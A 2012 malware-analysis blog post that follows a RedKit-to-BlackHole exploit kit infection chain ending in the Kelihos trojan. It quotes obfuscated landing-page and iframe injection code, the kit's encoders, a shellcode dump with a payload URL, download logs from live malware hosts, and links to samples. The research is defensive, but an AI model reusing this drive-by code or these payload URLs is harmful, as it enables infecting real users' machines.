Sunday, December 30, 2012

What happens if RedKit Exploit Kit teams up with BlackHole EK? = Triple payload + infection of Khelios!

It is the last crusade of the year 2012, and this crusade was started by a lead on RedKit. We heard that RedKit is going into heavy customization, so it is good for the new year's adventure as a "different" challenge from BHEK.

Sadly, I am in the hospital writing this, on duty waiting for my Dad to be transferred to another place, so I only have my Note PC to do this analysis; please bear with these initial results, I will add the binary analysis details after the new year. Unfortunately, this case is longer than I expected, but indeed it is good to kill my waiting time.

So here we go, the RedKit Exploit Kit to BHEK with triple payload downloads case, ending up with Khelios :-)

Infector URL:

h00p://optik-welter.de/hcwf.htm
Using Google as the referer plus IE/Java headers, we fetched it:
--17:58:21--  h00p://optik-welter.de/hcwf.htm
           => `hcwf.htm'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /hcwf.htm HTTP/1.0

Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie painted your front door *pink*
Accept: */*
Host: optik-welter.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 08:58:22 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Content-Length: 12996
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
17:58:23 (41.24 KB/s) - `hcwf.htm' saved [12996/12996]
Let's see what is inside:
<html><body><td>Ydoanunan onontothmeiun we i de idedovoitthcode..
ive="h00p://optik-welter・de/332.jar" code="Runs.class"><param n..
obapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f..
bapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4..
apoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36l..
pophwlllobapop"></applet><applet archive="h00p://optik-welter.d..
ame="elitken" value="lv9llobapopm0kllobapopt0vllobapophczllobap..
gllobapopezlllobapopdi1llobapop.l8llobapoprp1llobapope3pllobapo..
llobapop-iallobapopkkdllobapopi3kllobapoptyillobapoppydllobapop..
lobapoppdallobapopt82llobapoptlcllobapophk5llobapop"></applet>..
 var jsou = "src";
     var cxhy=document.createElement("iframe"); 
  function dettq()     
  {  
  document.body.appendChild(cxhy);  
  cxhy.setAttribute(jsou,"h00p://optik-welter・de/  
  }  
  var Ganni={version:"0.7.7",rDate:"04/11/2012",n..  
eturn function(){c(b,a)}},isDefined:function(b){return typeof b .. 
turn(/array/i).test(Object.prototype.toString.call(b))},isFunc:..
n"},isString:function(b){return typeof b=="string"},isNum:funct..
trNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},g..
egx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)..
umRegx).exec(b):null;return a?a[0]:null},compareNums:function(h..
   :
   : (snipped)
   :
Ganni.initScript();

flopp=Ganni.getVersion("AdobeReader");
if(flopp)
{
flopp=flopp.split(',');
if (((3+1) > flopp[1]  && (8+1)==flopp[0]) || ((2+1) > flopp[1] && (7+1)==flopp[0])) 
 {  
   cxhy.setAttribute("width",4);
   cxhy.setAttribute("height",12);
  dettq();
  }
}</script></body></html>
↑We see an old version of PluginDetect (0.7.7) modified for evil purposes. In the PluginDetect script we can easily see some suspicious malware infector download URLs like:
h00p://optik-welter.de/332.jar
h00p://optik-welter.de/887.jar
h00p://optik-welter.de/987.pdf
↑It is worth trying to download these, go ahead and try, but I prefer to go straight to the payload.

The Sharing of RedKit EK Infector Source/Code

The complete landing page HTML code is pasted here -->>[PASTEBIN]
The PluginDetect 0.7.7 code is here -->>[PASTEBIN]

Guide to Crack the RedKit Landing Page Code (to fetch the 1st payload)

In the landing page there is applet code that can lead us to the payload. The applet below is one of the keys to fetching the payload:
<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">
<param name="elitken" value="lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgqllobapophwlllobapop">
</applet>
Let's take the value of the parameter elitken:
 lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0
llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwa
llobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmk
llobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgq
llobapophwlllobapop
You see the repetition of the "llobapop" string? It is actually a delimiter.
So let's eliminate it, and we get the sets of garbled words below:
lrk m0i tde hh0 .qv 3yt 3kz /f0 e8x dxq .hk rxk ey5 trr lwa 
e5i wg4 -ad kyy il8 tg9 pmk o2t /lr /ol :36 px2 t4g tgq hwl
To decode this, we noticed a simple trick: take the first character of each word, then read those first characters backwards, and we get the download URL:
h00p://optik-welter.de/33.html
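The same first-character trick as an added worked example in JavaScript (this is not code from the kit or from this post). It takes the elitken value from the applet tag above, recovers the delimiter by looking for the most repeated substring (a heuristic of my own, not something the kit defines), and reads off the payload URL.

```javascript
// Added example, not code from the RedKit kit or from the original post.
// Decodes the RedKit "elitken" applet parameter: short tokens joined by a
// delimiter ("llobapop" above); the FIRST character of each token, read in
// reverse order, spells the payload URL. Everything else is padding.

// The elitken value exactly as it appears in the applet tag above.
const ELITKEN_SAMPLE =
  "lrkllobapopm0illobapoptdellobapophh0llobapop" +
  ".qvllobapop3ytllobapop3kzllobapop/f0llobapop" +
  "e8xllobapopdxqllobapop.hkllobapoprxkllobapop" +
  "ey5llobapoptrrllobapoplwallobapope5illobapop" +
  "wg4llobapop-adllobapopkyyllobapopil8llobapop" +
  "tg9llobapoppmkllobapopo2tllobapop/lrllobapop" +
  "/olllobapop:36llobapoppx2llobapopt4gllobapop" +
  "tgqllobapophwlllobapop";

// Recover the delimiter without knowing it (heuristic, my assumption): the
// substring of 3..16 chars whose non-overlapping repeat count times its
// length is largest. A padding scheme like this one repeats the delimiter
// once per token, so it dominates every other repeated fragment.
function findDelimiter(value, minLen = 3, maxLen = 16) {
  let best = { sub: "", score: 0 };
  for (let len = minLen; len <= maxLen; len++) {
    const seen = new Set();
    for (let i = 0; i + len <= value.length; i++) {
      const sub = value.slice(i, i + len);
      if (seen.has(sub)) continue;
      seen.add(sub);
      const count = value.split(sub).length - 1; // non-overlapping occurrences
      if (count >= 2 && count * len > best.score) {
        best = { sub, score: count * len };
      }
    }
  }
  return best.sub;
}

// Split on the delimiter, keep the first character of each non-empty token
// (the trailing delimiter leaves an empty token), reverse and join.
function decodeElitken(value, delim = findDelimiter(value)) {
  const tokens = value.split(delim).filter((t) => t.length > 0);
  return tokens.map((t) => t[0]).reverse().join("");
}

// Defang for notes and reports, in the same h00p:// style this post uses.
function defang(url) {
  return url.replace(/^http/i, "h00p");
}

const delim = findDelimiter(ELITKEN_SAMPLE);
const payloadUrl = decodeElitken(ELITKEN_SAMPLE, delim);
console.log("delimiter  :", delim);              // llobapop
console.log("payload URL:", defang(payloadUrl)); // h00p://optik-welter.de/33.html
```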

Payload 1

The above URL is actually the payload URL. 33.html is actually a PHP script that feeds you the payload binary file setup.exe, as per the PoC below:
@unixfreaxjp /malware]$ myfetch h00p://optik-welter.de/33.html

--18:16:43--  h00p://optik-welter.de/33.html
           => `33.html'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.

GET /33.html HTTP/1.0
Referer: h00p://www.google.com/..
User-Agent: #MalwareMustDie is hammering your door with nails.
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: optik-welter.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
    :
HTTP request sent, awaiting response...
    :
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 09:16:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 41472
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/octet-stream
   :
200 OK
18:16:46 (37.76 KB/s) - `33.html' saved [41472/41472]

@unixfreaxjp /malware]$ ls -alF 33.html
-rwxr--r--  1 rik  wheel  41472 Dec 30 18:16 33.html*

@unixfreaxjp /malware]$ mycheckbin ./33.html
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 07 00 5C 82 DF 50 00 00 00 00    PE..L......P....
 :                         :                                    :
 snipped....snipped..
↑Yes, it is a binary file, served as "setup.exe". I will do the binary analysis later, but let me explain what this malware does after it is executed on your system:

1. After injecting malicious code into another process:

0xdc setup.exe 
0x348 svchost.exe
2. It tries connecting to the malware domains below:
a-wing.com.ar 
girasoles-web.com.ar 
hsd-transport.com 
amcarlosbarrios.es 
littleowlletterpress.com 
beach-hotel-andalusia.com 
jastreb.hr 
gyneco-saint-andre.fr 
aliyahraks.com 
tvmarinaresort.com 
3. Each connected domain is sent an HTTP GET request:
a-wing.com.ar GET /h.htm HTTP/1.1
girasoles-web.com.ar GET /g.htm HTTP/1.1
hsd-transport.com GET /g.htm HTTP/1.1
amcarlosbarrios.es GET /m.htm HTTP/1.1
littleowlletterpress.com GET /v.htm HTTP/1.1
beach-hotel-andalusia.com GET /x.htm HTTP/1.1
jastreb.hr GET /c.htm HTTP/1.1
gyneco-saint-andre.fr GET /y.htm HTTP/1.1
aliyahraks.com GET /u.htm HTTP/1.1
tvmarinaresort.com GET /o.htm HTTP/1.1
↑These requests are sent rapidly; on my machine I counted 22,000 requests within 90 seconds!

4. Upon connecting you will be redirected to BHEK↓

--20:26:56--  h00p://beach-hotel-andalusia.com/x.htm
           => `x.htm'
Resolving beach-hotel-andalusia.com... seconds 0.00, 213.175.208.2
Caching beach-hotel-andalusia.com => 213.175.208.2
Connecting to beach-hotel-andalusia.com|213.175.208.2|:80... seconds 0.00, connected.
  :
GET /x.htm h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: beach-hotel-andalusia.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 301 Moved Permanently
Content-Length: 239
Content-Type: text/html
Location: h00p://linsubby.ru/count4.php
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Dec 2012 11:27:02 GMT
Connection: close
  :
301 Moved Permanently
Location: h00p://linsubby.ru/count4.php [following]
--20:26:57--  h00p://linsubby.ru/count4.php
           => `count4.php'
Resolving linsubby.ru... seconds 0.00, 31.207.231.141
Caching linsubby.ru => 31.207.231.141
Connecting to linsubby.ru|31.207.231.141|:80... seconds 0.00, connected.
  :
GET /count4.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: linsubby.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 302
Server: Apache
Content-Length: 0
Content-Type:
Last-Modified: Вс, 30 дек 2012 11:27:01 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 30 Dec 2012 11:26:59 GMT
X-Powered-By:PHP/5.3.2
Location:h00p://wufjajcy.ru/links/1.php
  :
302
Location: h00p://wufjajcy.ru/links/1.php [following]
Closed fd 1896
--20:27:00--  h00p://wufjajcy.ru/links/1.php
           => `1.php'
Resolving wufjajcy.ru... seconds 0.00, 184.82.27.102
Caching wufjajcy.ru => 184.82.27.102
Connecting to wufjajcy.ru|184.82.27.102|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d6548 (new refcount 1).
  :
GET /links/1.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: wufjajcy.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 11:27:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.18
  :
200 OK
Length: unspecified [text/html]
20:27:17 (6.67 KB/s) - `1.php' saved [92673]
After being redirected a few times, we arrive at wufjajcy.ru to fetch the 1.php file. This 1.php file is the BHEK landing page.

The Sharing of BHEK Infector Resources/Code

The BHEK landing page HTML code is here --->>[PASTEBIN]
The decoded BHEK PluginDetect 0.7.9 is here -->>[PASTEBIN] (please read our previous post about BHEK for guidance on decoding it)
The BHEK was weaponized ONLY for dropping the PDF, at function p1:
function p1(){
  var d = document.createElement("object");
  d.setAttribute("data", "/links/1.php?dcdjf=" + x("c833f") + "&nybnj=" + x("cqk") + 
  "&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=" + x(pdfver.join(".")));
  d.setAttribute("type", "application/pdf");
  document.body.appendChild(d);}
As explained before, let's use THEIR function to crack their code:
var a = x("TYPE-THE-STRING-HERE");
// the kit's encoder: each character code written in base 33, joined by ':'
function x(s) {
  d = [];
  for (i = 0; i < s.length; i++) {
    k = (s.charCodeAt(i)).toString(33);
    d.push(k);
  }
  return d.join(":");
}
document.write(a);
Which leads us to the download URL of:
/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
Wrap it with the BHEK domain name and download it:
URL: h00p://wufjajcy.ru/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
GET /links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: I am speachless seeing how fool your codes are - #MalwareMustDie
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 12:18:46 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Content-Length: 21419
ETag: "834215633845d4bc9d54eff04e9f149b"
Last-Modified: Sun, 30 Dec 2012 12:19:11 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,419 (21K) [application/pdf]
21:18:45 (9.04 KB/s) - `1.php@dcdjf' saved [21419/21419]
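An added example (not code from BHEK or from this post) that reimplements the kit's x() encoder together with its inverse and decodes the parameters of the BHEK URLs on this page. The rule that a value counts as encoded only when every ':'-separated group is a valid base-33 digit string is my assumption; what the decoded values mean is not claimed here.

```javascript
// Added example, not code from the BHEK kit or from the original post.
// Re-implements the landing page's x() encoder (each char code written in
// base 33, groups joined by ':'), adds its inverse, and decodes every
// parameter of the BHEK URLs shown on this page. Field names are the kit's
// random ones as they appear above.

// Same algorithm as the kit's x(): char code -> base-33 string, ':'-joined.
function bhekEncode(s) {
  const groups = [];
  for (let i = 0; i < s.length; i++) {
    groups.push(s.charCodeAt(i).toString(33));
  }
  return groups.join(":");
}

// Valid base-33 digits are 0-9 and a-w; 'x', 'y' and 'z' can never occur.
// Two digits cover char codes below 1089, i.e. all of ASCII and Latin-1.
const BASE33_GROUP = /^[0-9a-w]{1,2}$/i;

// True if a whole value is made of ':'-separated base-33 groups, the shape
// of every encoded BHEK value on this page (usable as a proxy-log signature).
function looksBase33Encoded(value) {
  return value.length > 0 && value.split(":").every((g) => BASE33_GROUP.test(g));
}

// Inverse of x(). Refuses anything that is not clean base-33 so that a
// token such as "kfxi" is not silently half-parsed by parseInt().
function bhekDecode(enc) {
  if (!looksBase33Encoded(enc)) throw new Error("not base-33 encoded: " + enc);
  return enc.split(":").map((g) => String.fromCharCode(parseInt(g, 33))).join("");
}

// Decode a BHEK query string (with or without the path in front). Values
// that are not base-33 encoded are kept verbatim and flagged encoded:false.
function decodeBhekQuery(url) {
  const query = url.includes("?") ? url.slice(url.indexOf("?") + 1) : url;
  const fields = {};
  for (const pair of query.split("&")) {
    const eq = pair.indexOf("=");
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? "" : pair.slice(eq + 1);
    fields[key] = looksBase33Encoded(value)
      ? { value: bhekDecode(value), encoded: true }
      : { value, encoded: false };
  }
  return fields;
}

// The two BHEK request URLs from this page: the PDF object URL built by p1()
// and the calc.exe URL found at the bottom of the shellcode dump.
const PDF_URL =
  "/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38" +
  "&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f";
const EXE_URL =
  "/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g" +
  "&cnw=1h&krac=kfxi&zago=mqsqjxwg";

for (const url of [PDF_URL, EXE_URL]) {
  console.log(url);
  for (const [k, f] of Object.entries(decodeBhekQuery(url))) {
    console.log("  " + k + " = " + JSON.stringify(f.value) + (f.encoded ? "" : "  (raw)"));
  }
}
```

The first two parameters of the PDF URL decode back to the x("c833f") and x("cqk") literals of p1(), while krac and zago of the calc.exe URL contain letters outside the base-33 alphabet and are reported raw.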
The downloaded file is actually a PDF file that contains evil JavaScript.
That code is at 0x48D; I made a GUIDE to crack & analyze it here --->>[PASTEBIN]
It uses the Adobe Reader exploit codes for
(1) Collab.getIcon, CVE-2009-0927, and (2) Collab.collectEmailInfo, CVE-2007-5659
↑As clearly stated in the guide, the exploit is used to execute the obfuscated shellcode strings, which in HEX can be viewed as below:
66 83 e4 fc fc 85 e4 75  34 e9 5f 33 cO 64 8b 4O   f......u4._3.d.@
3O 8b 4O Oc 8b 7O 1c 56  8b 76 O8 33 db 66 8b 5e   O.@..p.V.v.3.f.^
3c O3 74 33 2c 81 ee 15  1O ff ff b8 8b 4O 3O c3   <.t3,........@O.
46 39 O6 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78  O3 f5 56 8b 76 2O O3 f5   V.u<.t5x..V.v...
33 c9 49 41 fc ad O3 c5  33 db Of be 1O 38 f2 74   3.IA....3....8.t
O8 c1 cb Od O3 da 4O eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
24 O3 dd 66 8b Oc 4b 8d  46 ec ff 54 24 Oc 8b d8   $..f..K.F..T$...
O3 dd 8b O4 8b O3 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
2O 8O 7d Oc 33 74 O3 96  eb f3 8b 68 O8 8b f7 6a   ..}.3t.....h...j
O5 59 e8 98 ff ff ff e2  f9 e8 OO OO OO OO 58 5O   .Y............XP
6a 4O 68 ff OO OO OO 5O  83 cO 19 5O 55 8b ec 8b   j@h....P...PU...
5e 1O 83 c3 O5 ff e3 68  6f 6e OO OO 68 75 72 6c   ^......hon..hurl
6d 54 ff 16 83 c4 O8 8b  e8 e8 61 ff ff ff eb O2   mT........a.....
eb 72 81 ec O4 O1 OO OO  8d 5c 24 Oc c7 O4 24 72   .r.......\$...$r
65 67 73 c7 44 24 O4 76  72 33 32 c7 44 24 O8 2O   egs.D$.vr32.D$..
2d 73 2O 53 68 f8 OO OO  OO ff 56 Oc 8b e8 33 c9   -s.Sh.....V...3.
51 c7 44 1d OO 77 7O 62  74 c7 44 1d O5 2e 64 6c   Q.D..wpbt.D...dl
6c c6 44 1d O9 OO 59 8a  c1 O4 3O 88 44 1d O4 41   l.D...Y...O.D..A
51 6a OO 6a OO 53 57 6a  OO ff 56 14 85 cO 75 16   Qj.j.SWj..V...u.
6a OO 53 ff 56 O4 6a OO  83 eb Oc 53 ff 56 O4 83   j.S.V.j....S.V..
c3 Oc eb O2 eb 13 47 8O  3f OO 75 fa 47 8O 3f OO   ......G.?.u.G.?.
75 c4 6a OO 6a fe ff 56  O8 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
Oe ec 98 fe 8a Oe 89 6f  O1 bd 33 ca 8a 5b 1b c6   .......o..3..[..
46 79 36 1a 2f 7O 68 74  74 7O 3a 2f 2f 77 75 66   Fy6./phOOp://wuf
6a 61 6a 63 79 2e 72 75  2f 6c 69 6e 6b 73 2f 31   jajcy.ru/links/1
2e 7O 68 7O 3f 7a 65 67  71 71 7a 68 3d 33 3O 3a   .php?zegqqzh=3O:
31 6e 3a 31 69 3a 31 69  3a 33 33 26 75 77 75 63   1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31  6d 3a 31 6c 3a 31 6d 3a   =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a  3a 31 6d 3a 31 67 26 63   2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72  61 63 3d 6b 66 78 69 26   nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73  71 6a 78 77 67 OO OO OO   zago=mqsqjxwg...

Payload 2

At the bottom of the HEX dump you can see the payload URL :-) Let's fetch it:
URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040         3.49K/s    ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]
Another payload, calc.exe, so be it. This calc.exe deletes itself after being copied to:
%System%\ntvdm.exe
And is run via CMD, starting these processes:
0x348 svchost.exe 
0x420 svchost.exe 
0x7e4 ntvdm.exe 
0x7e4 ntvdm.exe 
0x7e4 ntvdm.exe 
And then it requests connections to these random domains:
  (and maybe others, once I get a chance to analyze the binary)
The domain & IP info of the host serving calc.exe:
wufjajcy.ru  A  184.82.27.102
wufjajcy.ru  NS  ns1.larstor.com
wufjajcy.ru  NS  ns2.larstor.com
wufjajcy.ru  NS  ns3.larstor.com
wufjajcy.ru  NS  ns4.larstor.com
wufjajcy.ru  NS  ns5.larstor.com
wufjajcy.ru  NS  ns6.larstor.com

Payload 3

This calc.exe downloads another malware file "newbos2.exe" via an HTTP GET request, as per the PoC:
--22:21:21--  h00p://cucaklif.ru/newbos2.exe
           => `newbos2.exe'
Resolving cucaklif.ru... seconds 0.00, 37.19.146.142
Caching cucaklif.ru => 37.19.146.142
Connecting to cucaklif.ru|37.19.146.142|:80... seconds 0.00, connected.
  :
GET /newbos2.exe HTTP/1.0
Accept: */*
Host: cucaklif.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 763904
Content-Type: application/octet-stream
Last-Modified: Вт, 01 янв 2002 02:16:15 GMT
Accept-Ranges: bytes
200 Ok
Length: 763,904 (746K) [application/octet-stream]
100%[===================================> ] 763,904        7.06K/s    ETA 00:00
22:31:13 (1.26 KB/s) - `newbos2.exe' saved [763904/763904]
A quick sandbox analysis shows:
// SELF-EXECUTED...

PId: 0x4ac 
Image Name: C:\newbos2.exe 
API:
CreateServiceA(hSCManager: 0x157048, 
lpServiceName: "NPF", 
lpDisplayName: "WinPcap Packet Driver (NPF)", 
dwDesiredAccess: 0xf01ff, 
dwServiceType: 0x1, 
dwStartType: 0x3, 
dwErrorControl: 0x1, 
lpBinaryPathName: "system32\drivers\NPF.sys", 
lpLoadOrderGroup: "(null)", 
lpdwTagId: 0x0, 
lpDependencies: 0x0, 
lpServiceStartName: "(null)", 
lpPassword: 0x0)

// REGISTRY...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SonyAgent 
REG_SZ 38 "C:\newbos2.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ContextChangedCurrent 
REG_SZ 138 "DMaWNZ4Ku1rL7IDJKR1RYFEEIRwBnxpmODxxvk5HaMX2C4K67X6Jyj7poL8MPRl87w=="

HKLM\System\CurrentControlSet\Services\NPF\DisplayName 
REG_SZ 56 "WinPcap Packet Driver (NPF)"

HKLM\System\CurrentControlSet\Services\NPF\ImagePath 
REG_EXPAND_SZ 50 "system32\drivers\NPF.sys"

//SOME DROPS....

C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\wpcap.dll

//STARTING SERVICE: WinPcap Packet Driver (NPF) up...

CreateServiceA(hSCManager: 0x157048, 
lpServiceName: "NPF", 
lpDisplayName: "WinPcap Packet Driver (NPF)", 
dwDesiredAccess: 0xf01ff, 
dwServiceType: 0x1, 
dwStartType: 0x3, 
dwErrorControl: 0x1, 
lpBinaryPathName: "system32\drivers\NPF.sys", 
lpLoadOrderGroup: "(null)", 
lpdwTagId: 0x0, 
lpDependencies: 0x0, 
lpServiceStartName: "(null)", 
lpPassword: 0x0)

// SUSPICIOUS HTTP query:


// EXECUTED THREAD PROCESSES..
0x2b0 lsass.exe 
0x3f4 svchost.exe 

// LOADING MODULE...
C:\WINDOWS\system32\wbem\wbemcons.dll by PID:0x3f4 (svchost.exe)

Virus Total Report

RedKit EK landing page - hcwf.htm 942641ec71e352d531805ed1082d6056 (0/44)
BHEK landing page - 1.php a66429f2424a3824a9eb054a9084cf5b (3/46)
RedKit Downloaded Troj1 - setup.exe dc042fd30376f2f056ab3851be6190c7 (15/43)
RedKit Downloaded Troj2 - calc.exe 42a4de1001682f27ad55c893af9bd23d (12/46)
BHEK PDF Trojan Downldr - sample3.pdf d68baa5a947cd84c993f6c5b972f6708 (22/46)
Final Trojan Khelios - newbos2.exe 476f829bc53228c303331aa1f783f7f0 (12/46)

URL Query Report

Samples

:-) Here's the download URL (for research purposes only!) -->>[MEDIAFIRE]

Infector Domain Analysis

The Khelios Domain & Historical IP Information:
(you can get more infector domains by tracing the historical IP addresses of these domains)
The DNS servers used for the Khelios payload .RU domains:
ns1.newrect.com
ns2.newrect.com
ns3.newrect.com
ns4.newrect.com
ns5.newrect.com
ns6.newrect.com
↑This registrar should be made a subject of investigation. So let's analyze how these infector domains are distributed by their evil DNS to their IP addresses. I am using two random DNS servers as a starting base for tracking the current NS records:
@unixfreaxjp /malware]$ date
Mon Dec 31 04:10:26 JST 2012

@unixfreaxjp /malware]$ mydnstrace cucaklif.ru worgukiw.ru oqivynle.ru

Tracing to cucaklif.ru[a] via 202.238.95.24, maximum of 3 retries
202.238.95.24 (202.238.95.24)
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
 |     |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
 |     |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
 |     |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
